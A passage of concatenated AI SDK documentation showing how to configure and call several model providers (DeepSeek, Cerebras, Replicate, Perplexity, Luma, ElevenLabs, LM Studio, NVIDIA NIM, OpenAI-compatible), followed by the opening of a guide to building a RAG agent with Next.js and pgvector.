import { generateText } from 'ai';
const { text } = await generateText({
model: deepseek('deepseek-chat'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
DeepSeek language models can be used in the streamText function
(see AI SDK Core).
Reasoning
DeepSeek has reasoning support for the deepseek-reasoner model:
import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';
const { text, reasoning } = await generateText({
model: deepseek('deepseek-reasoner'),
prompt: 'How many people will live in the world in 2040?',
});
console.log(reasoning);
console.log(text);
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Cache Token Usage
DeepSeek provides context caching on disk technology that can significantly reduce token costs for repeated content. You can access the cache hit/miss metrics through the providerMetadata property in the response:
import { deepseek } from '@ai-sdk/deepseek';
import { generateText } from 'ai';
const result = await generateText({
model: deepseek('deepseek-chat'),
prompt: 'Your prompt here',
});
console.log(result.providerMetadata);
// Example output: { deepseek: { promptCacheHitTokens: 1856, promptCacheMissTokens: 5 } }
The metrics include:
- promptCacheHitTokens: Number of input tokens that were cached.
- promptCacheMissTokens: Number of input tokens that were not cached.
Model Capabilities
| Model |
|---|
| deepseek-chat |
| deepseek-reasoner |
title: Cerebras description: Learn how to use Cerebras's models with the AI SDK.
Cerebras Provider
The Cerebras provider offers access to powerful language models through the Cerebras API, including their high-speed inference capabilities powered by Wafer-Scale Engines and CS-3 systems.
API keys can be obtained from the Cerebras Platform.
Setup
The Cerebras provider is available via the @ai-sdk/cerebras module. You can install it with:
pnpm add @ai-sdk/cerebras
Provider Instance
You can import the default provider instance cerebras from @ai-sdk/cerebras:
import { cerebras } from '@ai-sdk/cerebras';
For custom configuration, you can import createCerebras and create a provider instance with your settings:
import { createCerebras } from '@ai-sdk/cerebras';
const cerebras = createCerebras({
apiKey: process.env.CEREBRAS_API_KEY ?? '',
});
You can use the following optional settings to customize the Cerebras provider instance:
- baseURL (string): Use a different URL prefix for API calls. The default prefix is https://api.cerebras.ai/v1.
- apiKey (string): API key that is being sent using the Authorization header. It defaults to the CEREBRAS_API_KEY environment variable.
- headers (Record<string,string>): Custom headers to include in the requests.
- fetch ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation.
Language Models
You can create language models using a provider instance:
import { cerebras } from '@ai-sdk/cerebras';
import { generateText } from 'ai';
const { text } = await generateText({
model: cerebras('llama3.1-8b'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Cerebras language models can be used in the streamText function
(see AI SDK Core).
Model Capabilities
| Model |
|---|
| llama3.1-8b |
| llama3.1-70b |
| llama3.3-70b |
title: Replicate description: Learn how to use Replicate models with the AI SDK.
Replicate Provider
Replicate is a platform for running open-source AI models. It is a popular choice for running image generation models.
Setup
The Replicate provider is available via the @ai-sdk/replicate module. You can install it with
pnpm add @ai-sdk/replicate
Provider Instance
You can import the default provider instance replicate from @ai-sdk/replicate:
import { replicate } from '@ai-sdk/replicate';
If you need a customized setup, you can import createReplicate from @ai-sdk/replicate
and create a provider instance with your settings:
import { createReplicate } from '@ai-sdk/replicate';
const replicate = createReplicate({
apiToken: process.env.REPLICATE_API_TOKEN ?? '',
});
You can use the following optional settings to customize the Replicate provider instance:
- baseURL (string): Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.replicate.com/v1.
- apiToken (string): API token that is being sent using the Authorization header. It defaults to the REPLICATE_API_TOKEN environment variable.
- headers (Record<string,string>): Custom headers to include in the requests.
- fetch ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation.
Image Models
You can create Replicate image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
Supported Image Models
The following image models are currently supported by the Replicate provider:
- black-forest-labs/flux-1.1-pro-ultra
- black-forest-labs/flux-1.1-pro
- black-forest-labs/flux-dev
- black-forest-labs/flux-pro
- black-forest-labs/flux-schnell
- ideogram-ai/ideogram-v2-turbo
- ideogram-ai/ideogram-v2
- luma/photon-flash
- luma/photon
- recraft-ai/recraft-v3-svg
- recraft-ai/recraft-v3
- stability-ai/stable-diffusion-3.5-large-turbo
- stability-ai/stable-diffusion-3.5-large
- stability-ai/stable-diffusion-3.5-medium
You can also use versioned models.
The id for versioned models is the Replicate model id followed by a colon and the version ID ($modelId:$versionId), e.g.
bytedance/sdxl-lightning-4step:5599ed30703defd1d160a25a63321b4dec97101d98b4674bcc56e41f62f35637.
Basic Usage
import { replicate } from '@ai-sdk/replicate';
import { experimental_generateImage as generateImage } from 'ai';
import { writeFile } from 'node:fs/promises';
const { image } = await generateImage({
model: replicate.image('black-forest-labs/flux-schnell'),
prompt: 'The Loch Ness Monster getting a manicure',
aspectRatio: '16:9',
});
await writeFile('image.webp', image.uint8Array);
console.log('Image saved as image.webp');
Model-specific options
import { replicate } from '@ai-sdk/replicate';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: replicate.image('recraft-ai/recraft-v3'),
prompt: 'The Loch Ness Monster getting a manicure',
size: '1365x1024',
providerOptions: {
replicate: {
style: 'realistic_image',
},
},
});
Versioned Models
import { replicate } from '@ai-sdk/replicate';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: replicate.image(
'bytedance/sdxl-lightning-4step:5599ed30703defd1d160a25a63321b4dec97101d98b4674bcc56e41f62f35637',
),
prompt: 'The Loch Ness Monster getting a manicure',
});
For more details, see the Replicate models page.
title: Perplexity description: Learn how to use Perplexity's Sonar API with the AI SDK.
Perplexity Provider
The Perplexity provider offers access to Sonar API - a language model that uniquely combines real-time web search with natural language processing. Each response is grounded in current web data and includes detailed citations, making it ideal for research, fact-checking, and obtaining up-to-date information.
API keys can be obtained from the Perplexity Platform.
Setup
The Perplexity provider is available via the @ai-sdk/perplexity module. You can install it with:
pnpm add @ai-sdk/perplexity
Provider Instance
You can import the default provider instance perplexity from @ai-sdk/perplexity:
import { perplexity } from '@ai-sdk/perplexity';
For custom configuration, you can import createPerplexity and create a provider instance with your settings:
import { createPerplexity } from '@ai-sdk/perplexity';
const perplexity = createPerplexity({
apiKey: process.env.PERPLEXITY_API_KEY ?? '',
});
You can use the following optional settings to customize the Perplexity provider instance:
- baseURL (string): Use a different URL prefix for API calls. The default prefix is https://api.perplexity.ai.
- apiKey (string): API key that is being sent using the Authorization header. It defaults to the PERPLEXITY_API_KEY environment variable.
- headers (Record<string,string>): Custom headers to include in the requests.
- fetch ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation.
Language Models
You can create Perplexity models using a provider instance:
import { perplexity } from '@ai-sdk/perplexity';
import { generateText } from 'ai';
const { text } = await generateText({
model: perplexity('sonar-pro'),
prompt: 'What are the latest developments in quantum computing?',
});
Sources
Websites that have been used to generate the response are included in the sources property of the result:
import { perplexity } from '@ai-sdk/perplexity';
import { generateText } from 'ai';
const { text, sources } = await generateText({
model: perplexity('sonar-pro'),
prompt: 'What are the latest developments in quantum computing?',
});
console.log(sources);
Provider Options & Metadata
The Perplexity provider includes additional metadata in the response through providerMetadata.
Additional configuration options are available through providerOptions.
const result = await generateText({
model: perplexity('sonar-pro'),
prompt: 'What are the latest developments in quantum computing?',
providerOptions: {
perplexity: {
return_images: true, // Enable image responses (Tier-2 Perplexity users only)
},
},
});
console.log(result.providerMetadata);
// Example output:
// {
// perplexity: {
// usage: { citationTokens: 5286, numSearchQueries: 1 },
// images: [
// { imageUrl: "https://example.com/image1.jpg", originUrl: "https://elsewhere.com/page1", height: 1280, width: 720 },
// { imageUrl: "https://example.com/image2.jpg", originUrl: "https://elsewhere.com/page2", height: 1280, width: 720 }
// ]
// },
// }
The metadata includes:
- usage: Object containing citationTokens and numSearchQueries metrics.
- images: Array of image URLs when return_images is enabled (Tier-2 users only).
You can enable image responses by setting return_images: true in the provider options. This feature is only available to Perplexity Tier-2 users and above.
Model Capabilities
| Model |
|---|
| sonar-pro |
| sonar |
| sonar-deep-research |
title: Luma description: Learn how to use Luma AI models with the AI SDK.
Luma Provider
Luma AI provides state-of-the-art image generation models through their Dream Machine platform. Their models offer ultra-high quality image generation with superior prompt understanding and unique capabilities like character consistency and multi-image reference support.
Setup
The Luma provider is available via the @ai-sdk/luma module. You can install it with
pnpm add @ai-sdk/luma
Provider Instance
You can import the default provider instance luma from @ai-sdk/luma:
import { luma } from '@ai-sdk/luma';
If you need a customized setup, you can import createLuma and create a provider instance with your settings:
import { createLuma } from '@ai-sdk/luma';
const luma = createLuma({
apiKey: 'your-api-key', // optional, defaults to LUMA_API_KEY environment variable
baseURL: 'custom-url', // optional
headers: {
/* custom headers */
}, // optional
});
You can use the following optional settings to customize the Luma provider instance:
- baseURL (string): Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.lumalabs.ai.
- apiKey (string): API key that is being sent using the Authorization header. It defaults to the LUMA_API_KEY environment variable.
- headers (Record<string,string>): Custom headers to include in the requests.
- fetch ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Image Models
You can create Luma image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
Basic Usage
import { luma } from '@ai-sdk/luma';
import { experimental_generateImage as generateImage } from 'ai';
import fs from 'fs';
const { image } = await generateImage({
model: luma.image('photon-1'),
prompt: 'A serene mountain landscape at sunset',
aspectRatio: '16:9',
});
const filename = `image-${Date.now()}.png`;
fs.writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);
Image Model Settings
When creating an image model, you can customize the generation behavior with optional settings:
const model = luma.image('photon-1', {
maxImagesPerCall: 1, // Maximum number of images to generate per API call
pollIntervalMillis: 5000, // How often to check for completed images (in ms)
maxPollAttempts: 10, // Maximum number of polling attempts before timeout
});
Since Luma processes images through an asynchronous queue system, these settings allow you to tune the polling behavior:
- maxImagesPerCall (number): Override the maximum number of images generated per API call. Defaults to 1.
- pollIntervalMillis (number): Control how frequently the API is checked for completed images while they are being processed. Defaults to 500ms.
- maxPollAttempts (number): Limit how long to wait for results before timing out, since image generation is queued asynchronously. Defaults to 120 attempts.
Model Capabilities
Luma offers two main models:
| Model | Description |
|---|---|
| photon-1 | High-quality image generation with superior prompt understanding |
| photon-flash-1 | Faster generation optimized for speed while maintaining quality |
Both models support the following aspect ratios:
- 1:1
- 3:4
- 4:3
- 9:16
- 16:9 (default)
- 9:21
- 21:9
For more details about supported aspect ratios, see the Luma Image Generation documentation.
Key features of Luma models include:
- Ultra-high quality image generation
- 10x higher cost efficiency compared to similar models
- Superior prompt understanding and adherence
- Unique character consistency capabilities from single reference images
- Multi-image reference support for precise style matching
Advanced Options
Luma models support several advanced features through the providerOptions.luma parameter.
Image Reference
Use up to 4 reference images to guide your generation. Useful for creating variations or visualizing complex concepts. Adjust the weight (0-1) to control the influence of reference images.
// Example: Generate a salamander with reference
await generateImage({
model: luma.image('photon-1'),
prompt: 'A salamander at dusk in a forest pond, in the style of ukiyo-e',
providerOptions: {
luma: {
image_ref: [
{
url: 'https://example.com/reference.jpg',
weight: 0.85,
},
],
},
},
});
Style Reference
Apply specific visual styles to your generations using reference images. Control the style influence using the weight parameter.
// Example: Generate with style reference
await generateImage({
model: luma.image('photon-1'),
prompt: 'A blue cream Persian cat launching its website on Vercel',
providerOptions: {
luma: {
style_ref: [
{
url: 'https://example.com/style.jpg',
weight: 0.8,
},
],
},
},
});
Character Reference
Create consistent and personalized characters using up to 4 reference images of the same subject. More reference images improve character representation.
// Example: Generate character-based image
await generateImage({
model: luma.image('photon-1'),
prompt: 'A woman with a cat riding a broomstick in a forest',
providerOptions: {
luma: {
character_ref: {
identity0: {
images: ['https://example.com/character.jpg'],
},
},
},
},
});
Modify Image
Transform existing images using text prompts. Use the weight parameter to control how closely the result matches the input image (higher weight = closer to input but less creative).
// Example: Modify existing image
await generateImage({
model: luma.image('photon-1'),
prompt: 'transform the bike to a boat',
providerOptions: {
luma: {
modify_image_ref: {
url: 'https://example.com/image.jpg',
weight: 1.0,
},
},
},
});
For more details about Luma's capabilities and features, visit the Luma Image Generation documentation.
title: ElevenLabs description: Learn how to use the ElevenLabs provider for the AI SDK.
ElevenLabs Provider
The ElevenLabs provider contains language model support for the ElevenLabs transcription API.
Setup
The ElevenLabs provider is available in the @ai-sdk/elevenlabs module. You can install it with
pnpm add @ai-sdk/elevenlabs
Provider Instance
You can import the default provider instance elevenlabs from @ai-sdk/elevenlabs:
import { elevenlabs } from '@ai-sdk/elevenlabs';
If you need a customized setup, you can import createElevenLabs from @ai-sdk/elevenlabs and create a provider instance with your settings:
import { createElevenLabs } from '@ai-sdk/elevenlabs';
const elevenlabs = createElevenLabs({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the ElevenLabs provider instance:
- apiKey (string): API key that is being sent using the Authorization header. It defaults to the ELEVENLABS_API_KEY environment variable.
- headers (Record<string,string>): Custom headers to include in the requests.
- fetch ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Transcription Models
You can create models that call the ElevenLabs transcription API
using the .transcription() factory method.
The first argument is the model id, e.g. scribe_v1.
const model = elevenlabs.transcription('scribe_v1');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format can sometimes improve transcription performance if known beforehand.
import { experimental_transcribe as transcribe } from 'ai';
import { elevenlabs } from '@ai-sdk/elevenlabs';
const result = await transcribe({
model: elevenlabs.transcription('scribe_v1'),
audio: new Uint8Array([1, 2, 3, 4]),
providerOptions: { elevenlabs: { languageCode: 'en' } },
});
The following provider options are available:
- languageCode (string): An ISO-639-1 or ISO-639-3 language code corresponding to the language of the audio file. Can sometimes improve transcription performance if known beforehand. Defaults to null, in which case the language is predicted automatically.
- tagAudioEvents (boolean): Whether to tag audio events like (laughter), (footsteps), etc. in the transcription. Defaults to true.
- numSpeakers (integer): The maximum amount of speakers talking in the uploaded file. Can help with predicting who speaks when. The maximum amount of speakers that can be predicted is 32. Defaults to null, in which case the amount of speakers is set to the maximum value the model supports.
- timestampsGranularity (enum): The granularity of the timestamps in the transcription. Defaults to 'word'. Allowed values: 'none', 'word', 'character'.
- diarize (boolean): Whether to annotate which speaker is currently talking in the uploaded file. Defaults to true.
- fileFormat (enum): The format of input audio. Defaults to 'other'. Allowed values: 'pcm_s16le_16', 'other'. For 'pcm_s16le_16', the input audio must be 16-bit PCM at a 16kHz sample rate, single channel (mono), and little-endian byte order. Latency will be lower than with passing an encoded waveform.
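A sketch combining several of these options (the audio file name is illustrative):

import { experimental_transcribe as transcribe } from 'ai';
import { elevenlabs } from '@ai-sdk/elevenlabs';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: elevenlabs.transcription('scribe_v1'),
  audio: await readFile('interview.mp3'), // illustrative file name
  providerOptions: {
    elevenlabs: {
      diarize: true, // annotate speakers
      numSpeakers: 2,
      timestampsGranularity: 'word',
    },
  },
});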
Model Capabilities
| Model |
|---|
| scribe_v1 |
| scribe_v1_experimental |
title: LM Studio description: Use the LM Studio OpenAI compatible API with the AI SDK.
LM Studio Provider
LM Studio is a user interface for running local models.
It contains an OpenAI compatible API server that you can use with the AI SDK. You can start the local server under the Local Server tab in the LM Studio UI ("Start Server" button).
Setup
The LM Studio provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API.
You can install it with
pnpm add @ai-sdk/openai-compatible
Provider Instance
To use LM Studio, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const lmstudio = createOpenAICompatible({
name: 'lmstudio',
baseURL: 'http://localhost:1234/v1',
});
Language Models
You can interact with local LLMs in LM Studio using a provider instance.
The first argument is the model id, e.g. llama-3.2-1b.
const model = lmstudio('llama-3.2-1b');
To be able to use a model, you need to download it first.
Example
You can use LM Studio language models to generate text with the generateText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const lmstudio = createOpenAICompatible({
name: 'lmstudio',
baseURL: 'http://localhost:1234/v1',
});
const { text } = await generateText({
model: lmstudio('llama-3.2-1b'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
maxRetries: 1, // immediately error if the server is not running
});
LM Studio language models can also be used with streamText.
Embedding Models
You can create models that call the LM Studio embeddings API
using the .embedding() factory method.
const model = lmstudio.embedding('text-embedding-nomic-embed-text-v1.5');
Example - Embedding a Single Value
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { embed } from 'ai';
const lmstudio = createOpenAICompatible({
name: 'lmstudio',
baseURL: 'http://localhost:1234/v1',
});
// 'embedding' is a single embedding object (number[])
const { embedding } = await embed({
model: lmstudio.textEmbeddingModel('text-embedding-nomic-embed-text-v1.5'),
value: 'sunny day at the beach',
});
Example - Embedding Many Values
When loading data, e.g. when preparing a data store for retrieval-augmented generation (RAG), it is often useful to embed many values at once (batch embedding).
The AI SDK provides the embedMany function for this purpose.
Similar to embed, you can use it with embeddings models,
e.g. lmstudio.textEmbeddingModel('text-embedding-nomic-embed-text-v1.5') or lmstudio.textEmbeddingModel('text-embedding-bge-small-en-v1.5').
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { embedMany } from 'ai';
const lmstudio = createOpenAICompatible({
name: 'lmstudio',
baseURL: 'http://localhost:1234/v1',
});
// 'embeddings' is an array of embedding objects (number[][]).
// It is sorted in the same order as the input values.
const { embeddings } = await embedMany({
model: lmstudio.textEmbeddingModel('text-embedding-nomic-embed-text-v1.5'),
values: [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
],
});
title: NVIDIA NIM description: Use NVIDIA NIM OpenAI compatible API with the AI SDK.
NVIDIA NIM Provider
NVIDIA NIM provides optimized inference microservices for deploying foundation models. It offers an OpenAI-compatible API that you can use with the AI SDK.
Setup
The NVIDIA NIM provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API.
You can install it with:
pnpm add @ai-sdk/openai-compatible
Provider Instance
To use NVIDIA NIM, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const nim = createOpenAICompatible({
name: 'nim',
baseURL: 'https://integrate.api.nvidia.com/v1',
headers: {
Authorization: `Bearer ${process.env.NIM_API_KEY}`,
},
});
Language Models
You can interact with NIM models using a provider instance. For example, to use DeepSeek-R1, a powerful open-source language model:
const model = nim.chatModel('deepseek-ai/deepseek-r1');
Example - Generate Text
You can use NIM language models to generate text with the generateText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const nim = createOpenAICompatible({
name: 'nim',
baseURL: 'https://integrate.api.nvidia.com/v1',
headers: {
Authorization: `Bearer ${process.env.NIM_API_KEY}`,
},
});
const { text, usage, finishReason } = await generateText({
model: nim.chatModel('deepseek-ai/deepseek-r1'),
prompt: 'Tell me the history of the San Francisco Mission-style burrito.',
});
console.log(text);
console.log('Token usage:', usage);
console.log('Finish reason:', finishReason);
Example - Stream Text
NIM language models can also generate text in a streaming fashion with the streamText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';
const nim = createOpenAICompatible({
name: 'nim',
baseURL: 'https://integrate.api.nvidia.com/v1',
headers: {
Authorization: `Bearer ${process.env.NIM_API_KEY}`,
},
});
const result = streamText({
model: nim.chatModel('deepseek-ai/deepseek-r1'),
prompt: 'Tell me the history of the Northern White Rhino.',
});
for await (const textPart of result.textStream) {
process.stdout.write(textPart);
}
console.log();
console.log('Token usage:', await result.usage);
console.log('Finish reason:', await result.finishReason);
NIM language models can also be used with other AI SDK functions like generateObject and streamObject.
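For example, a sketch of generateObject with a Zod schema (the schema and prompt are illustrative):

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateObject } from 'ai';
import { z } from 'zod';

const nim = createOpenAICompatible({
  name: 'nim',
  baseURL: 'https://integrate.api.nvidia.com/v1',
  headers: {
    Authorization: `Bearer ${process.env.NIM_API_KEY}`,
  },
});

const { object } = await generateObject({
  model: nim.chatModel('deepseek-ai/deepseek-r1'),
  schema: z.object({
    dish: z.string(),
    ingredients: z.array(z.string()),
  }),
  prompt: 'Invent a vegetarian taco recipe.',
});

console.log(object);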
title: OpenAI Compatible Providers description: Use OpenAI compatible providers with the AI SDK.
OpenAI Compatible Providers
You can use the OpenAI Compatible Provider package to use language model providers that implement the OpenAI API.
Below we focus on the general setup and provider instance creation. You can also write a custom provider package leveraging the OpenAI Compatible package.
We provide detailed documentation for a number of OpenAI compatible providers. The general setup and provider instance creation is the same for all of these providers.
Setup
The OpenAI Compatible provider is available via the @ai-sdk/openai-compatible module. You can install it with:
pnpm add @ai-sdk/openai-compatible
Provider Instance
To use an OpenAI compatible provider, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const provider = createOpenAICompatible({
name: 'provider-name',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
});
You can use the following optional settings to customize the provider instance:
- baseURL (string): Set the URL prefix for API calls.
- apiKey (string): API key for authenticating requests. If specified, adds an Authorization header to request headers with the value Bearer <apiKey>. This will be added before any headers potentially specified in the headers option.
- headers (Record<string,string>): Optional custom headers to include in requests. These will be added to request headers after any headers potentially added by use of the apiKey option.
- queryParams (Record<string,string>): Optional custom url query parameters to include in request urls.
- fetch ((input: RequestInfo, init?: RequestInit) => Promise<Response>): Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create provider models using a provider instance.
The first argument is the model id, e.g. model-id.
const model = provider('model-id');
Example
You can use provider language models to generate text with the generateText function:
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
const provider = createOpenAICompatible({
name: 'provider-name',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
});
const { text } = await generateText({
model: provider('model-id'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Including model ids for auto-completion
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';
type ExampleChatModelIds =
| 'meta-llama/Llama-3-70b-chat-hf'
| 'meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo'
| (string & {});
type ExampleCompletionModelIds =
| 'codellama/CodeLlama-34b-Instruct-hf'
| 'Qwen/Qwen2.5-Coder-32B-Instruct'
| (string & {});
type ExampleEmbeddingModelIds =
| 'BAAI/bge-large-en-v1.5'
| 'bert-base-uncased'
| (string & {});
const model = createOpenAICompatible<
ExampleChatModelIds,
ExampleCompletionModelIds,
ExampleEmbeddingModelIds
>({
name: 'example',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.example.com/v1',
});
// Subsequent calls to e.g. `model.chatModel` will auto-complete the model id
// from the list of `ExampleChatModelIds` while still allowing free-form
// strings as well.
const { text } = await generateText({
model: model.chatModel('meta-llama/Llama-3-70b-chat-hf'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
Custom query parameters
Some providers may require custom query parameters. An example is the Azure AI
Model Inference
API
which requires an api-version query parameter.
You can set these via the optional queryParams provider setting. These will be
added to all requests made by the provider.
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
const provider = createOpenAICompatible({
name: 'provider-name',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
queryParams: {
'api-version': '1.0.0',
},
});
For example, with the above configuration, API requests would include the query parameter in the URL like:
https://api.provider.com/v1/chat/completions?api-version=1.0.0.
Provider-specific options
The OpenAI Compatible provider supports adding provider-specific options to the request body. These are specified with the providerOptions field in the request body.
For example, if you create a provider instance with the name provider-name, you can add a custom-option field to the request body like this:
const provider = createOpenAICompatible({
name: 'provider-name',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
});
const { text } = await generateText({
model: provider('model-id'),
prompt: 'Hello',
providerOptions: {
'provider-name': { customOption: 'magic-value' },
},
});
The request body sent to the provider will include the customOption field with the value magic-value. This gives you an easy way to add provider-specific options to requests without having to modify the provider or AI SDK code.
Custom Metadata Extraction
The OpenAI Compatible provider supports extracting provider-specific metadata from API responses through metadata extractors. These extractors allow you to capture additional information returned by the provider beyond the standard response format.
Metadata extractors receive the raw, unprocessed response data from the provider, giving you complete flexibility to extract any custom fields or experimental features that the provider may include. This is particularly useful when:
- Working with providers that include non-standard response fields
- Experimenting with beta or preview features
- Capturing provider-specific metrics or debugging information
- Supporting rapid provider API evolution without SDK changes
Metadata extractors work with both streaming and non-streaming chat completions and consist of two main components:
- A function to extract metadata from complete responses
- A streaming extractor that can accumulate metadata across chunks in a streaming response
Here's an example metadata extractor that captures both standard and custom provider data:
const myMetadataExtractor: MetadataExtractor = {
// Process complete, non-streaming responses
extractMetadata: ({ parsedBody }) => {
// You have access to the complete raw response
// Extract any fields the provider includes
return {
myProvider: {
standardUsage: parsedBody.usage,
experimentalFeatures: parsedBody.beta_features,
customMetrics: {
processingTime: parsedBody.server_timing?.total_ms,
modelVersion: parsedBody.model_version,
// ... any other provider-specific data
},
},
};
},
// Process streaming responses
createStreamExtractor: () => {
let accumulatedData = {
timing: [],
customFields: {},
};
return {
// Process each chunk's raw data
processChunk: parsedChunk => {
if (parsedChunk.server_timing) {
accumulatedData.timing.push(parsedChunk.server_timing);
}
if (parsedChunk.custom_data) {
Object.assign(accumulatedData.customFields, parsedChunk.custom_data);
}
},
// Build final metadata from accumulated data
buildMetadata: () => ({
myProvider: {
streamTiming: accumulatedData.timing,
customData: accumulatedData.customFields,
},
}),
};
},
};
You can provide a metadata extractor when creating your provider instance:
const provider = createOpenAICompatible({
name: 'my-provider',
apiKey: process.env.PROVIDER_API_KEY,
baseURL: 'https://api.provider.com/v1',
metadataExtractor: myMetadataExtractor,
});
The extracted metadata will be included in the response under the providerMetadata field:
const { text, providerMetadata } = await generateText({
model: provider('model-id'),
prompt: 'Hello',
});
console.log(providerMetadata.myProvider.customMetrics);
This allows you to access provider-specific information while maintaining a consistent interface across different providers.
---
title: RAG Agent
description: Learn how to build a RAG Agent with the AI SDK and Next.js
tags: ['rag', 'chatbot', 'next', 'embeddings', 'database', 'retrieval', 'memory', 'agent']
---
RAG Agent Guide
In this guide, you will learn how to build a retrieval-augmented generation (RAG) agent.
Before we dive in, let's look at what RAG is, and why we would want to use it.
What is RAG?
RAG stands for retrieval augmented generation. In simple terms, RAG is the process of providing a Large Language Model (LLM) with specific information relevant to the prompt.
Why is RAG important?
While LLMs are powerful, the information they can reason about is restricted to the data they were trained on. This problem becomes apparent when you ask an LLM for information outside of its training data, such as proprietary data or events that occurred after the model’s training cutoff. RAG solves this problem by fetching information relevant to the prompt and then passing that to the model as context.
To illustrate with a basic example, imagine asking the model for your favorite food:
**input**
What is my favorite food?
**generation**
I don't have access to personal information about individuals, including their
favorite foods.
Not surprisingly, the model doesn’t know. But imagine, alongside your prompt, the model received some extra context:
**input**
Respond to the user's prompt using only the provided context.
user prompt: 'What is my favorite food?'
context: user loves chicken nuggets
**generation**
Your favorite food is chicken nuggets!
Just like that, you have augmented the model’s generation by providing relevant information to the query. Assuming the model has the appropriate information, it is now highly likely to return an accurate response to the user’s query. But how does it retrieve the relevant information? The answer relies on a concept called embedding.
Embedding
Embeddings are a way to represent words, phrases, or images as vectors in a high-dimensional space. In this space, similar words are close to each other, and the distance between words can be used to measure their similarity.
In practice, this means that if you embedded the words cat and dog, you would expect them to be plotted close to each other in vector space. A common way to calculate the similarity between two vectors is cosine similarity, where a value of 1 indicates high similarity and a value of -1 indicates high opposition.
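To make this concrete, here is a small sketch, assuming the AI Gateway embedding model string used later in this guide, that embeds two words and compares them with the AI SDK's cosineSimilarity helper:

```ts
import { embedMany, cosineSimilarity } from 'ai';

// Embed two words with the same model used later in this guide.
const { embeddings } = await embedMany({
  model: 'openai/text-embedding-ada-002',
  values: ['cat', 'dog'],
});

// Values close to 1 indicate high semantic similarity;
// values close to -1 indicate high opposition.
console.log(cosineSimilarity(embeddings[0], embeddings[1]));
```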
As mentioned above, embeddings are a way to represent the semantic meaning of words and phrases. The implication here is that the larger the input to your embedding, the lower quality the embedding will be. So how would you approach embedding content longer than a simple phrase?
Chunking
Chunking refers to the process of breaking down a particular source material into smaller pieces. There are many different approaches to chunking and it’s worth experimenting as the most effective approach can differ by use case. A simple and common approach to chunking (and what you will be using in this guide) is separating written content by sentences.
Once your source material is appropriately chunked, you can embed each one and then store the embedding and the chunk together in a database. Embeddings can be stored in any database that supports vectors. For this tutorial, you will be using Postgres alongside the pgvector plugin.
All Together Now
Combining all of this together, RAG is the process of enabling the model to respond with information outside of its training data by embedding the user’s query, retrieving the relevant source material (chunks) with the highest semantic similarity, and then passing them alongside the initial query as context. Going back to the example where you ask the model for your favorite food, the prompt preparation process would look like this.
By passing the appropriate context and refining the model’s objective, you are able to fully leverage its strengths as a reasoning machine.
Onto the project!
Project Setup
In this project, you will build an agent that will only respond with information that it has within its knowledge base. The agent will be able to both store and retrieve information. This project has many interesting use cases, from customer support through to building your own second brain!
This project will use the following stack:
- Next.js 14 (App Router)
- AI SDK
- Vercel AI Gateway
- Drizzle ORM
- Postgres with pgvector
- shadcn-ui and TailwindCSS for styling
Clone Repo
To reduce the scope of this guide, you will be starting with a repository that already has a few things set up for you:
- Drizzle ORM (lib/db) including an initial migration and a script to migrate (db:migrate)
- a basic schema for the resources table (this will be for source material)
- a Server Action for creating a resource
To get started, clone the starter repository with the following command:
<Snippet text={[ 'git clone https://github.com/vercel/ai-sdk-rag-starter', 'cd ai-sdk-rag-starter', ]} />
First things first, run the following command to install the project’s dependencies:
